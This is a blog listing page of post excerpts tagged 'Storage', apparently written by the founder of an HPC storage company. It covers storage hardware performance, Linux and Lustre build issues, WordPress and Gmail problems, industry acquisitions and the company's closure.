Below you will find pages that utilize the taxonomy term “Storage”
Posts
Wordpress is recovering (was very sick)
Please note: Wordpress appears to be failing badly at this stage. I’ll be working on a fix this week, and likely will create a new site out of different, less buggy code. I’ve checked the DB, moved it to a different machine, restored from a known working backup. It appears a recent update of WP managed to completely screw up post handling. I disabled all plugins, ran health checks, etc. I’ve cleaned cookies, browsing history, used different browsers on different machines, with exactly the same outcome.
Posts
How to handle curious conversations ... part 1 of a few billion
So … Suppose someone comes up to you and makes a claim. This claim isn’t backed by facts, merely by unicorns, rainbows, and their own biases. Yeah, this kind of relates to the previous post. They argue based upon the claim. Stake out their ground. Insist that “none shall pass” in a black knight, Monty Python esq manner. But they are wrong. Simply, factually wrong. Regardless of their biases, you and many others have been demonstrating the very thing that is claimed to be impossible, to customers for years.
Posts
Distribution package dependency radii, or why distros may be doomed
I am a sucker for a good editor. I like atom. Don’t yell at me. Its pretty good for my use cases. It has lots of nice extensions I can and have used. Atom is not without its dependencies though. Installing it, which should be relatively simple, turns out to be … well … interesting.
[root@centos7build nyble]# rpm -ivh ~/atom.x86_64.rpm error: Failed dependencies: libXss.so.1()(64bit) is needed by atom-1.26.0-0.1.x86_64 In searching the interwebs for what Xss is, I happened across this little tidbit
Posts
NyBLE
So there I am updating my new repository to enable using zfs in the ramboot images. This is a simplification and continuation of the previous work I did a few years ago, with some massive code cleanups. And sadly, no documentation yet. Will fix soon, but for now, I am trying to hit the major functionality points. NyBLE is a linux environment for hypervisor hosts. It builds on the old open source SIOS work, and extends it in significant ways.
Posts
Dealing with disappointment
In the last few years, I’ve had major disappointments professionally. The collapse of Scalable, some of the positively ridiculous things associated with the aftermath of that, none of which I’ve written about until they are over. Almost over, but not quite. Waiting for confirmation. My job search last year, and some of the disappointment associated with that. Recently I’ve had different type of disappointments, without getting into details. The way I’ve dealt with these things in the past has been to try to understand if there was a conflict, what could I have done better.
Posts
Late Feb 2018 update
Again, many apologies over the low posting frequency. Several things that are nearing completion (hopefully soon) that I want finalized first. That said, the major news is that this site is now on a much improved server and network. I’ve switched from Comcast Business to WOW business. So far, much better speed, more consistent performance, far lower cost per bandwidth. I do have lots to write about, and have been saving things up until after this particular objective is met, so I can work/write distraction free.
Posts
Apologies on the slow posting rate
Many things are going on simultaneously right now, and I have little time to compose thoughts for the blog. I anticipate a bit of a letup in the next week or two as the year comes to a close.
Posts
Cool bug on upgrade (not)
Wordpress is an interesting beast. Spent hours working through issues that I shouldn’t have needed to on an upgrade, as some functions were deprecated. In an interesting way. By removing them, and throwing an error. Which I found only through looking at a specific log. So out goes that plugin. And the site is back.
Posts
#SC17
I’ve had numerous requests from friends and colleagues about whether I will be attending #SC17 this year. Sadly, this is not to be the case. $dayjob has me attending an onsite meeting that week in San Francisco, and the schedule was such that I could not attend the talks I was interested in. I’d love for there to be a way to listen to the talks remotely. Maybe I’ll simply buy the DVD/USB stick of the talks if there is an online store for them.
Posts
A completed project: mysqldump file to CSV converter
This was part of something else I’d worked on, but it never saw the light of day for a number of (rather silly) reasons. So rather than let these bits go to waste, I created a github repo for posterity. Someone might be able to make effective use of them somewhere. Repo is located here: https://github.com/joelandman/msd2csv Pretty simple code, does most of the work in-memory, and multiple regex passes to transform and clean up the CSV.
Posts
Cray "acquires" ClusterStor business unit from Seagate
Information at this link. It is being called a “strategic transaction”, though it likely came about vis-a-vis Seagate doing some profound and deep thinking over what business it was in. Seagate has been weathering a storm, and has been working on re-orgs to deal with a declining disk market. They acquired ClusterStor as part of a preceding transaction of Xyratex. Xyratex was the basis for the Cray storage platforms (post Enginio).
Posts
The birthday problem (allocation collisions) for networks and MAC addresses
The birthday problem is a fairly simple to state situation. There is at least a 50% probability (e.g. even chance) that at least 2 of 23 randomly chosen people in a room have the same birthday. This comes from some elementary applications of statistics, and is documented on Wikipedia. While we care less about networks celebrating their annual journey around Sol, we care more about potential address collisions for statically assigned IP addresses.
Posts
Now for your bidding pleasure, the contents of one company
This is an on-going process I won’t comment on, other than to provide a link to the bidding site. There are numerous cool items in there.
Lot 2-57207: a 64 bay siFlash/Cadence machine with 64x 400GB SAS SSDs. Fully operational, SSDs very lightly used, extraordinarily fast unit. Lot 2-57215: 2 mac minis (one was my desktop unit) Lot 2-57216: My old Macbook pro, 750 GB SSD, 16 GB ram, NVidia gfx Lot 2-57081: Mac pro tower unit Lot 2-57232: a bunch of awesome monitors Lot 2-57222: Mini 24U rack with PDUs Lot 2-57015: Supermicro Twin 2U system (5 others just like it) Lot 2-57100: a 40 core 256GB testbed machine And many other computer systems, parts, etc.
Posts
One door has closed, another has opened
As I had written previously, my old company, Scalable Informatics, has closed. Read that posting to see why and how, but as with all things … we must move forward. It is cliche' to use the title phrase. But it is also true. We know the door that closed. It’s the door that has opened afterwards that I am focusing upon. I have joined Joyent to work on, as it turns out, many similar things to what I did at Scalable.
Posts
Hard disk shipments dropped 10% QoQ, 2% YoY
This jives very well with what I’ve observed. Decreasing demand for enterprise storage hard disks, or as I call them “Spinning Rust Drives” (or SRD) as compared with SSD (Solid State Drives). The summary is here with a key quote being
Again, jives well with what I’ve observed. Mellanox has a good take on its blog, noting that
This is a critical point. While SRD are dropping in volume, there is not enough SSD fab capacity to supply the market demand.
Posts
I always love these breathless stories of great speed, and how VCs love them ...
Though, when I look at the “great speed”, it is often on par with or less than Scalable Informatics sustained years before. From 2013 SC13 show, on the show floor, after blasting through a POC at unheard of speed, and setting long standing records in the STAC-M3 benchmarks …
Article in question is in the Register. Some of the speeds and feeds:
* 200 microsecs latency * 45GBps read bandwidth * 15GBps write bandwidth * 7 million IOPS But then … a fibre connection.
Posts
Requiem
This is the post an entrepreneur hopes to never write. They pour their energy, their time, their resources, their love into their baby. Trying to make her live, trying to make her grow. And for a while, she seems to. Everything is hitting the right way, 12+ years of uninterrupted growth and profitable operation as an entirely bootstrapped company. Market leading … no … dominating … from the metrics customers tell you are important … position.
Posts
Best comment I've seen in a bug report about a tool
So … gnome-terminal has been my standard cli interface on linux GUIs for a while. I can’t bring myself to use KDE for any number of reasons. Gnome itself went in strange directions, so I’ve been using Cinnamon atop Mint and Debian 8. Ok, Debian 8. Gnome-terminal. Some things missing when you right mouse button click. Like “open new tab”. Open new window is there. This works. But no tab entry.
Posts
structure by indentation ... grrrr ....
If you have to do this:
:%s/\t/ /g in order to get a very simple function to compile because of this error
File "./snd.py", line 13 return sum ^ IndentationError: unindent does not match any outer indentation level even though your editor (atom!!!!??!?!) wasn’t showing you these mixed tabs and spaces … Yeah, there is something profoundly wrong with the approach. The function in question was all of 10 lines.
Posts
What is old, is new again
Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to go from a static linking programs to a more modular dynamic linking. The thought processes were that it would save precious memory, not having many copies of libc statically linked in to binaries. It would reduce file sizes, as most of your code would be in libraries.
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
A nice shout out in ComputerWeekly.com about @scalableinfo #HPC #storage
See the article here.
They mention Axellio, and on The Reg article on their ISE product, they say “X-IO partners using Axellio will be able to compete with DSSD, Mangstor and Zstor and offer what EMC has characterised as face-melting performance.” Hey, we were the first to come up with “face melting performance”. More than a year ago. And it really wasn’t us, but my buddy Dr. James Cuff of Harvard.
Posts
when you eliminate the impossible, what is left, no matter how improbable, is likely the answer
This is a fun one. A customer has quite a collection of all-flash Unison units. A while ago, they asked us to turn on LLDP support for the units. It has some value for a number of scenarios. Later, they asked us to turn it off. So we removed the daemon. Unison ceased generating/consuming LLDP packets. Or so we thought. Fast forward to last week. We are being told that LLDP PDUs are being generated by the kit.
Posts
Virtualized infrastructure, with VM storage on software RAID + a rebuild == occasional VM pauses
Not what I was hoping for. I may explain more of what I am doing later (less interesting than why I am doing it), but suffice it to say that I’ve got a machine I’ve turned into a VM/container box, so I can build something I need to build. This box has a large RAID6 for storage. Spinning disk. Fairly well optimized, I get good performance out of it. The box has ample CPU, and ample memory.
Posts
There are real, and subtle differences between su and sudo
Most of the time, sudo just works. Every now and then, it doesn’t. Most recently was with a build I am working on, where I got a “permission denied” error for creating a directory. The reason for this was non-obvious at first. You “are” superuser after all when you sudo, right? Aren’t you? Sort of. Your effective user ID has been set to the superuser. Your real user ID still is yours.
Posts
Combine these things, and get a very difficult to understand customer service
In the process of disconnecting a service we don’t need anymore. So I call their number. Obviously reroutes to a remote call center. One where english is not the primary language. I’m ok with this, but the person has a very thick and hard to understand accent. Their usage and idiom were not American, or British English. This also complicates matters somewhat, but I am used to it. I can infer where they were from, from their usage.
Posts
A new (old) customer for the day job
Our friends at MSU HPCC now are the proud owners of a very fast/high performance Unison Flash storage system, and a ZFS backed high performance Unison storage spinning disk unit. Installed first week of Jan 2017. As MSU is one of my alma mater institutions, I am quite happy about helping them out with this kit. They’ve been a customer previously; they had bought some HPC MPI/OpenMP programming training in the dim and distant past.
Posts
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Posts
Another itch scratched
So there you are, with many software RAIDs. You’ve been building and rebuilding them. And somewhere along the line, you lost track of which devices were which. So somehow you didn’t clean up the last build right, and you thought you had a hot spare … until you looked at /proc/mdstat … and said … Oh … So. I wanted to do the detailed accounting, in a simple way. I want the tool to tell me if I am missing a physical drive (e.
Posts
fortran for webapps
Use Fortran for your MVC web app. No, really … Here you are, coding your new density functional theory app, and you want to give it a nice shiny new web framework front end. Config files are so … 80s … Like in grad school, man … You want shiny new MVC action, with the goodness of fortran mixed in. Out comes Fortran.io.
Posts
She's dead Jim
It looks like (if the rumor is true) that Solaris will be pushing up the daisies soon. Note: Solaris != SmartOS This has been a long time coming. Combine this with Fujitsu dumping SPARC for headline projects … yeah … its likely over. FWIW: I like SmartOS. The issue for it are drivers. We tried helping, and were able to get one group to update their driver set. But getting others to update (specifically Mellanox) will be even harder now (and it was impossible beforehand, for reasons that were not Mellanox’s fault).
Posts
Inventory reduction event at the day job
We’ve got 3x Unison (https://scalableinformatics.com/unison) and 1x cadence (https://scalableinformatics.com/cadence) system that we need to clear out. The Unison machines are 5-7GB/s each, and the Cadence is 10-20GB/s and 200-600k IOPs (depending upon storage configuration). More info by emailing me. Everything is on a first come, first served basis, feel free to reach out if you’d like to hear more. Specs: ucp-01: Unison1 12 core, 128GB ram 2x40GbE or 4x10GbE ports 60x 2TB drives 4x 800GB SSD ucp-04: Unison2 12 core, 128GB ram 2x40GbE or 4x10GbE ports 60x 2TB drives 4x 800GB SSD usn-03: Cadence1 12 core, 128GB ram 2x40GbE or 4x10GbE ports 48x 400GB SATA SSD One more unlisted Unison unit with the same specs as the others, though with 3TB drives.
Posts
Its 2016, almost 2017 ... fix your application installer so it doesn't need to reboot my machine!
There I was running my windows in a window on my desktop. Running a nice little word processor from a company in Redmond, WA. Working on a document. About 15 minutes in, and I usually save at 30 minute boundaries … because … hey … they haven’t quite figured out that the word processor should do this for you … AUTOMATICALLY … Ok, I am shouting. Calm down. Anyway, for some reason, some little Cupertino company’s code pops up and says “hey, you wanna update me?
Posts
Watching a low level attack in process
I won’t say where, but it is fascinating watching what is being tried. I won’t divulge details of any sort (asymmetric information works to my advantage here).
Posts
On expectations
This has happened multiple times over the last few months. Just variations on the theme as it were, so I’ll talk about the theme. The day job builds some of the fastest systems for storage and analytics in market. We pride ourselves on being able to make things go very … very fast. If its slow, IMO, its a bug. So we often get people contacting us with their requirements. These requirements are often very hard for our competitors, and fairly simple for us to address.
Posts
The joy of IE and URLs, or how to fix ridiculous parsing errors on the part of some "helpers"
Short version. Day job sending some marketing out. URLs are pretty clear cut. Tested well. But some clients seem to have mis-parsed the url. Like with a trailing “)”. For some reason. That I don’t quite grok. I tried a few ways of fixing it. Yes, I know, because I fixed it, I baked it into the spec. /sigh First was a regex rewrite rule. Turns out the rewrite didn’t quite work the way it was intended, and it killed the requests.
Posts
Build me a big data analysis room
This was the request that showed up on our doorstep. A room. Not a system. But a room. Visions of the Star Trek NG bridge came to mind. Then the old SGI power wall … 7 meters wide by 2 meters high, driven by an awesomely powerful Onyx system (now underpowered compared to a good Nvidia card). Of course, the budget wouldn’t allow any of these, but it was still a cool request.
Posts
Running conditioning on 4x Forte #HPC #NVMe #storage units
This is our conditioning pass to get the units to stable state for block allocations. We run a number of fill passes over the units. Each pass takes around 42 minutes for the denser units, 21 minutes for the less dense ones. After a few passes, we hit a nice equilibrium, and performance is more deterministic, and less likely to drop as block allocations gradually fill the unit. We run the conditioning over the complete device, one conditioning process per storage device, with multiple iterations of the passes.
Posts
Amazing statistics
In the last year, this has been what this blog has seen for visitors/viewers and page views. 188,654 (unique) visitors 2,572,665 page views I am … humbled …
Posts
Aquila launches Aquarius
Story is here, at the always excellent InsideHPC site. Scroll the linked page on Aquarius to see some of their tech and their partners … Congrats guys! Great job!
Posts
New #HPC #storage configs for #bigdata , up to 16PB at 160GB/s
This is an update to Scalable Informatics “portable petabyte” offering. Basically, from 1 to 16PB of usable space, distributed and mirrored metadata, high performance (100Gb) network fabric, we’ve got a very dense, very fast system available now, at a very aggressive price point (starting configs around $0.20/GB). Batteries included … long on features, functionality, performance. Short on cost. We are leveraging the denser spinning rust drives (SRD), as well as a number of storage technologies that we’ve built or integrated into the systems.
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And its available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
An article on Python vs Julia for scripting
For those whom don’t know, Julia is a very powerful new language, which aims to leverage a JIT compilation mechanism to generate very fast numerical/computational code in general from a well thought out language. I’ve argued for a while that it feels like a better Python than Python. Python, for those whom aren’t aware, is a scripting language which has risen in popularity over the recent years. It is generally fairly easy to work in, with a few caveats.
Posts
M&A time: HPE buys SGI, mostly for the big data analytics appliances
I do expect more consolidation in this space. There aren’t many players doing what SGI (and the day job) does. The story is here. The interesting thing about this is, that this is in the high performance data analytics appliance space. As they write:
12-16% CAGR for data analytics, which I think is low … . And the point they may about the data explosion is exactly what we talk about as well.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. Its not quite an exact description, have a look at Kx’s website for a more accurate one.
Posts
About that cloud "security"
Wow … might want to rethink what you do and how you do it. See here. Put in simple terms, why bother to encrypt if your key is (trivially) recoverable? I did not realize that side channel attacks were so effective. Will read the paper. If this isn’t just a highly over specialized case, and is actually applicable to real world scenarios, we’ll need to make sure we understand methods to mitigate.
Posts
Ah Gmail ... losing more emails
So … my wife and I have private gmail addresses. Not related to the day job. She sends me an email from there. It never arrives. Gmail to gmail. Not in the spam folder. But to gmail. So I have her send it to this machine. Gets here right away. We moved the day job’s support email address off gmail (its just a reflector now) into the same tech running inside our FW.
Posts
Real scalability is hard, aka there are no silver bullets
I talked about hypothetical silver bullets in the recent past at a conference and to customers and VCs. Basically, there is no such thing as a silver bullet … no magic pixie dust, or magical card, or superfantastic software you can add to a system to make it incredibly faster. Faster, better performing systems require better architecture (physical, algorithmic, etc.). You really cannot hope to throw a metric-ton of machines at a problem and hope that scaling is simple and linear.
Posts
Having to do this in a kernel build is simply annoying
So there are some macros, DATE and TIME that the gcc compiler knows about. And some people inject these into their kernel module builds, because, well, why not. The issue is that they can make “reproducible builds” harder. Well, no, they really don’t. That’s a side issue. And of course, modern kernel builds use -Wall -Werror which converts warnings like macro "__TIME__" might prevent reproducible builds [-Werror=date-time] into real honest-to-goodness errors.
Posts
Going to #KXcon2016 this weekend to talk #NVMe #HPC #Storage for #kdb #iot and #BigData
This should be fun! This is being organized and run by my friend Lara of Xand Marketing. Excellent talks scheduled, fun bits (raspberry pi based kdb+!!!). Some similarities with the talk I gave this morning, but more of a focus on specific analytics issues relevant for people with massive time series data sets and a need to analyze them. Looking forward to getting out to Montauk … haven’t been there since I did my undergrad at Stony Brook.
Posts
Gave a talk today at #BeeGFS User Meeting 2016 in Germany on #NVMe #HPC #Storage
… through the magic of Google Hangouts. I think they will be posting the talk soon, but you are welcome to view the PDF here.
Posts
Success with rambooted Lustre v2.8.53 for #HPC #storage
[root@usn-ramboot ~]# uname -r 3.10.0-327.13.1.el7_lustre.x86_64 [root@usn-ramboot ~]# df -h / Filesystem Size Used Avail Use% Mounted on tmpfs 8.0G 4.3G 3.8G 53% / [root@usn-ramboot ~]# [root@usn-ramboot ~]# rpm -qa | grep lustre kernel-3.10.0-327.13.1.el7_lustre.x86_64 kernel-tools-3.10.0-327.13.1.el7_lustre.x86_64 kernel-devel-3.10.0-327.13.1.el7_lustre.x86_64 lustre-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64 kernel-tools-libs-devel-3.10.0-327.13.1.el7_lustre.x86_64 lustre-osd-ldiskfs-mount-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64 kernel-headers-3.10.0-327.13.1.el7_lustre.x86_64 lustre-osd-ldiskfs-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64 kernel-tools-libs-3.10.0-327.13.1.el7_lustre.x86_64 lustre-modules-2.8.53_1_g34dada1-3.10.0_327.13.1.el7_lustre.x86_64.x86_64 This means that we can run Lustre 2.8.x atop Unison. Still pre-alpha, as I have to get an updated kernel into this, as well as update all the drivers.
Posts
Its not perfect, but we have CentOS/RHEL 7.2 and Lustre integrated into SIOS now
Lustre is infamous for its kernel specificity, and it is, sadly, quite problematic to get running on a modern kernel (3.18+). This has implications for quite a large number of things, including whole subsystems with a partial back-porting to earlier kernels … which quite often misses very critical bits for stability/performance. I am not a fan of back porting for features, I am a fan of updating kernels for features. But that is another issue that I’ve talked about in the past.
Posts
reason #31659275 not to use java
As seen on hacker news linking to an Arstechnica article, this little tidbit. This is the money quote:
I know it seems obvious now to Google and to others, but mebbe … mebbe … they should rethink building a platform in a non-open language? I’ve talked about OSS type systems in terms of business risk for well more than a decade. OSS software intrinsically changes the risk model, so that you do not have a built in dependency upon another stack that could go away at any moment.
Posts
isn't this the definition of a Ponzi scheme?
From this article at the WSJ detailing the deflation of the tech bubble in progress now.
A Ponzi scheme is like this:
Posts
Every now and then you get an eye opener
This one is while we are conditioning a Forte NVMe unit, and I am running our OS install scripts. Running dstat in a window to watch the overall system …
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system-- usr sys idl wai hiq siq| read writ| recv send| in out | int csw 2 5 94 0 0 0| 0 22G| 218B 484B| 0 0 | 363k 368k 1 4 94 0 0 0| 0 22G| 486B 632B| 0 0 | 362k 367k 1 4 94 0 0 0| 0 22G| 628B 698B| 0 0 | 363k 368k 2 5 92 1 0 0| 536k 110G| 802B 2024B| 0 0 | 421k 375k 1 4 93 2 0 0| 0 22G| 360B 876B| 0 0 | 447k 377k Wait … is that 110GB/s (2nd line from bottom, in the writ column) ?
Posts
there are times
that try my patience. Usually with poorly implemented filtering tools of one form or another. The SPF mechanism is to provide an anti-spoofing system, which identifies which machines are allowed to send email in your domain name. The tools that purport to test it? Not so good. I get conflicting answers from various tools for a simple SPF record. The online tester (interactive) seems to work and show me my config is working nicely.
Posts
Of course, this means more work ahead
Our client code that pulls configuration bits from a boot server works great. But the config it pulls is distribution specific. Where we need to be is distribution/OS agnostic, and set things in a document database. Let the client convert the configuration into something OS specific. This is, to a degree, a solved problem. Indeed, etcd is just a modern reworking of what we did with the client code … using a fixed client (e.
Posts
Very preliminary RHEL7/CentOS7 SIOS base support
This is rebasing our SIOS tech atop RHEL7/CentOS7. Very early stage, pre-alpha, lots of debugger windows open … but …
[root@usn-ramboot ~]# cat /etc/redhat-release CentOS Linux release 7.2.1511 (Core) [root@usn-ramboot ~]# uname -r 4.4.6.scalable [root@usn-ramboot ~]# df -h / Filesystem Size Used Avail Use% Mounted on tmpfs 8.0G 4.7G 3.4G 59% / Dracut is giving me a few fits, but I’ve finished that side for the most part, and am now into the debugging the post-pivot environment.
Posts
When spam bots attack
I’ve been fixing up a few mail servers to be more discriminating over their connections. And I’ve noted that I didn’t have any automated tooling to block the spammers. I have lots of tooling to filter and control things. So I wrote a quick log -> ban list generator. Not perfect, but it seems to work nicely. Like I don’t have enough to do this week. /sigh Meetings tomorrow starting at 8am.
Posts
Why sticking with distro packages can be (very) bad for your security
I’ve been keeping a variety of systems up to date, updating security and other bits with zealous fervor. Security is never far from my mind, as I’ve watched bad practices being used at customers resulting in any number of things … from minor probes, through (in one case, with a grad student impacted by a windows key logger), taking down a linux cluster, but not before knocking the university temporarily off the internet.
Posts
Not-so-modern file system errors in modern file systems
On a system in heavy production use, using an underlying file system for metadata service, we see this:
kernel: EXT4-fs warning: ext4_dx_add_entry:1992: Directory index full! Ok, where does this come from? Ext3 had a limit of 32000 directory entries per directory, unless you turned on the dir_index feature. Ext4 theoretically has no limit. Well, its 64000 if you don’t use dir_index. Which we do use. Really the feature you want is dir_nlink.
Posts
SIOS-metrics being updated soon with our process table sampler
I needed to look at processes on the machine I’d been spending time debugging, in terms of what was running, what the state, the allocations, the IO, etc. Something was causing a hard panic, and it seemed correlated with an application issue. I didn’t have a process space sampler, so I wrote one. Takes one sample per second right now (configurable) across the whole process space. Uses 1% CPU or so normally.
Posts
Caught a not-so-cool bug in a hypervisor running on a production machine
Not naming names. Its a good product. It just gives up the ghost when you request 1.5x available memory, and the OS actually tries … tries … to fulfill the request. I thought I had set the maximum oversubscription amount to 85% of swap + physical. Yet, along came a nice spike and WHAMMO. Down the machine went. That this was a high visibility production machine, with hard uptime requirements … not so good.
Posts
Sadly we can't afford the time or people to go to BioIT world expo next week
Short handed + lots of very near term projects + many things that demand our attention == us pulling out. I wish it was otherwise, but we have limited people bandwidth, and I can’t afford 2 days doing booth duty while we have hard deliverables. /sigh Maybe 2017. We’ll see. And no, even though HPC on Wall Street is the same time, we aren’t going to that either. I like the show, but same issue with timing/people/projects.
Posts
Ways to not reach me
I’ve implemented a very strict policy for inbound phone calls. If I don’t recognize the number it goes to voicemail. If its important enough to call me, its important enough to leave me a message. If a call comes in with an unknown number, I won’t answer it. It can go through to voicemail. If it comes through with a restricted number, it only goes through to voicemail, though I am starting to think that such calls should be automatically blocked (as in never even given the opportunity to go to voicemail).
Posts
Spent the day fighting with a database that did not honor "be liberal in what you accept"
To put it bluntly, its escaping not only doesn’t match its docs, but appears to be internally inconsistent. I kept getting errors that google couldn’t really find much on, other than to suggest they were fixed bugs. I might have something to say on that. Looking forward to the next phase of this work, where we skip this db and focus on kdb+.
Posts
Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage
TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1USD/GB). Contact us for more details. This is with a file system …
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
Just another day, debugging someone's installer
I like the installers that attempt (and then fail) to calculate what they need, and generate installation target names programmaticlly. I know … I know… its an attempt to reduce the level of pain for some folks, as the algorithm works for some sets of inputs. But not mine. And mine are valid. What we need is an –I_know_what_the_heck_I_am_asking_for_so_please_just_do_the_install switch. Or, I have their installer (thankfully non-terrible perl code) up in an editor to see if I can find the offensive part, and then I can patch it (and send them the patch).
Posts
What a difference a CEO makes
So Microsoft will be starting to produce Linux software. This would never have happened under the previous CEO. With this change, Microsoft’s addressable market just grew fairly significantly for this product. Of course, there are ways for them to mess this up. Such as if they have features only available under windows. That would rather permanently consign this product to the dustbin of history. This said, I am hopeful that this CEO gets it, and will make sure that the changes Microsoft needs to make, are, in fact, made.
Posts
One of those days where you search for information on a problem
and find that you wrote on a mailing list almost half a decade ago about the problem, that it hasn’t been fixed. This is a little sad.
Posts
Fixed the asymmetric problem by moving to a different switch/network
Long story but it was a time sensitive POC bug. I like the switch I was using, but we needed this up ASAP. Customer was waiting. So I yanked all the 40GbE cards from the servers, put in multiport 10GbE, set up 802.3ad LAGs. Then moved to the Arista in the lab (great switch BTW). Its been years since I set one up, so out came the manual. Read up on setting up the LAGs and port channels … I had forgotten why I liked using them so much.
Posts
Cool asymmetric network performance happened to mess up a customer benchmark
A bunch of Unison systems, a 40 GbE network interconnecting them, and a bunch of client nodes on 40GbE -> 4x 10GbE links (to accomodate enough clients for the load testing). 40GbE < -> 40GbE works great. Full bandwidth, only minor oddities (single thread performance around 27Gb/s, need multiple threads to hit 40). 10GbE < -> 10GbE works great. Full bandwidth, nothing odd. 10GbE -> 40GbE works great, get about the expected bandwidth (10GbE).
Posts
Interesting ... so will they be sued for patents
Turns out next Ubuntu is fully baking in ZFS into the kernel and distributing it. This seems directly contrary to the licensing CDDL vs GPL, and chances are some folks will be unhappy with it. The big question is, will the IP holders sue. Because if they don’t, they may actually have given up their right to sue. Or has Canonical obtained a license to distribute. This is my understanding as I am not a lawyer, so I can’t really be sure of this (and I’d recommend you ask one if you are not sure).
Posts
New tool to help visualize /proc/interrupts and info in /proc/irq/$INT/
This is a start, not ready for release yet, but already useful as a diagnostic tool. I wanted to see how my IRQs were laid out, as this has been something of a persistent problem. I’ve built some intelligence into our irqassign.pl tool, but I need a way to see where the system is investing most of its interrupts. I omit (on purpose) IRQs that have been assigned, but have generated no interrupts.
Posts
Not sufficiently caffeinated for technical work today
I just spent 30 minutes trying to figure out why the 32 bit q process would run on one machine, while the identical tree and config would fail with a license expired on my desktop (development box). Turns out one should check for an old license file in one’s home directory. /sigh I think I need to send an RFE for an ‘–low-coffee-mode’ option.
Posts
Radio Free HPC is (as usual) worth a listen
Good wrap up of last years trends, this week at InsideHPC Radio Free HPC podcast. We get a small mention around 10:50 or so. Thats not why its an especially good listen. The team arrived at many of the same conclusions we did last year, which is why we brought out Forte, and we have some additional products planned in that line for later on in the year. Basically NVM and variants, NVMe, etc.
Posts
"Unexpected" cloud storage retrieval charges, or "RTFM"
An article appeared on HN this morning. In it, the author noted that all was not well with the universe, as their backup, using Amazon’s Glacier product, wound up being quite expensive for a small backup/restore. The OP discovered some of the issues with Glacier when they began the restore (not commenting on performance, merely the costing). Basically, to lure you in, they provide very low up front costs. That is, until you try to pull the data back for some reason.
Posts
Container jutsu
Linux containers are all the rage, with Docker, rkt, lxd, etc. all in market to various degrees. You have companies like Docker, CoreOS, and Rancher all vying for mindshare, not to mention some of the plumbing bits by google and many others. I don’t think they are a fad, there is much that is good with containers, when they are done right. To see how they are done right, have a good hard long look at SmartOS.
Posts
Hard filtering of calls
I find that, over time, my cell phone number has propagated out to spammers/scammers whom want to call me up to sell me something. The US national do-not-call registry hasn’t helped. The complaints I’ve filed haven’t helped. So I filter. My filtering algo looks like this:
if (number_is_known_person_or_org(phone_number)) { take_call_if_possible(); else if (number_is_unknown(phone_number)) { filter_stage_2(phone_number) } function filter_stage_2(phone_number) { // I ignore 80% of numbers I don't know, let them go to // voicemail.
Posts
Nutanix files for IPO
Short story here. I am not going to pour over their S-1 form to find interesting tidbits, others will do that, and are paid to do so. They are the first of several, though I had thought that Dell would acquire them before they hit IPO. I am guessing that the combination of the price for them, plus the EMC acquisition stopped this conversation. So now Nutanix is going to IPO.
Posts
Toshiba contemplating spinning out NAND flash
This is remarkable if true, and if they follow through with it, it will change the landscape of Flash quite a bit. Right now there are 43 major flash providers, and a few smaller ones. Building flash fabs is expensive, even given the demand and process improvements, there is still quite a bit of investment required to set up a flash fab. Toshiba has some cool kit here, we’ve worked with it (and in full disclosure, we were talking about working more closely with them in the past).
Posts
Google GMail is broken, not passing emails, losing others
Yeah, the headline says it all. The reason I rolled to GMail (and am paying for it for each user and then some) for the corporate services was, well, they promised to make running email easy, painless, and I wouldn’t have to worry about email management any more. Now I have to worry about pissed off customers whom are angry at me for not responding, even though I see the outbound emails in my sent folder, and from our ticketing system.
Posts
M&A: NetApp grabs SolidFire
This one has been in the rumor mill for a while. NetApp has been needing something to play well in the all flash array space, and it now has something. This said, the array space is very much on the decline certainly with respect to dumb JBODs and smart “filer heads”. That design is being retired in favor of smarter and hyperconverged systems. Such as Unison with Ceph, Forte, and related HCI (hyper converged infrastructure) systems.
Posts
Good read on market sizing for VCs and entrepreneurs
Not a how to guide, but a higher level meta discussion … about that market size discussion. See here. I’ve experienced the endless cycle of meetings over “size of market”. Not fun. These days, I have a very simple classifier with respect to investors.
